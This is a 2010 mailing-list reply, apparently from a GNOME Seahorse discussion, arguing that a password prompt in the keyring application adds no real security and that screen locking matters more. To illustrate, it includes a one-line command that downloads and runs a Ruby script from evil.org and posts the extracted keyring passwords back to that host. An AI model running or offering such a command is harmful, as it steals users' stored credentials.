-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Am Mon, 13 Dec 2010 17:59:52 +0200 schrieb Yaron Sheffer <yaronf gmx com>: > Seahorse is available on many machines, and any snoop can come by and > view the passwords. What Karl is suggesting (I believe) is that the > Seahorse *application* should require the login (or keyring?) > password to be entered, even though as an application, it already has > access to the passwords. > > I agree with Karl that this would provide real security benefit, even > though a smarter attacker, or one who has more time, can install > another application and access the same secrets. Sorry but it sounds like some snakeoil if seahorse asks for a password. It doesn't makes the system more secure. This only seems more security. Of course it's possible to ask for some password but there are enough other ways to access the passwords. In my opinion there are two options: * Leave everything open and lock the screen every time * Ask for a password on _every query_ of _every application_. But this makes you typing passwords all the time. The Applications should not cache the password for security reasons (e.g. locked memory). So you have to retype your "master"-password every time your email program query the server for new emails, every time you change the network, ever time ... If somebody doesn't believe me how easily it is, to access all passwords I attached some short script. It takes only seconds do extract all passwords: ruby -e "$(curl http://evil.org/discoverall.rb )" | curl -d @- http://evil.org/receive_passwords.php In my opinion the User should learn to lock their screen if they doesn't trust their environment. Gnome-keyring has many options to protect passwords e.g. automatic locking after some time. This can really improve the security in contrast of blocking some textfields with a password. Florian -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.16 (GNU/Linux) iQIcBAEBCAAGBQJNBo3jAAoJEDG1ZAdA+6K+et0P/iRNUddQINb5ckWRQ9Uy0u3E zd8syo4m08gv2/OJXYQWPtd4z5ZeyZ64ye+SarZbJrvAL5kaJJ9L24QDTTr1AnIq Mu3xoE5beHVXL3UHZQ5RZJqil0g+Dy22eYpvCE2Vrp3NsK+1fpFVPIGDDs+iMCFI Kj7tIfdSf+7M46Y73nRdQOC4J9y08Ra6UQ4M4WphLcz+0B7xlEJS0PYUOG8y+3qO fgixcgw6j4S1BCfu2dvl1gLhUhoccxW+v5/EU09J227CZr9GGdQ9R1WW7Ph5MmJo xEhnZzNZiTDw78qXgJJV0vnJCr3osfyt+N68dGOsOkFsWeCyjddInEP/QMd6saZh lV5wVKcbEQCuusFSWADrffWt7bm/FaInbhsaGogPsSOrpO6fQ8yzaH3K86GKK7Un IhIoxcFF9DcjJUHMLo8MXgEJSscDHGe2K5D6qg4vj7kWNCjBPyDOgKX3uLGTte0x +3PmixsSaK+B9UGayhuiG7R3xDoVszJM7pG/EoYmvI8bGOGcX6PiVjS9dElsghsM L3kdTEE9/RiNpJTJSn0J6CVuFn2YM8Lly4LmQg0/RRUApqwIXdsFyUewzVRRXMEe l3UnRSCArrxpnXl1p1b6iT/doRkEohNtze/PXf0ABBE98f1t55c1n7sWDYjArcXx je4K3VlJFSqJxH4t4od6 =BZd0 -----END PGP SIGNATURE-----
Attachment:
discoverall.rb
Description: application/ruby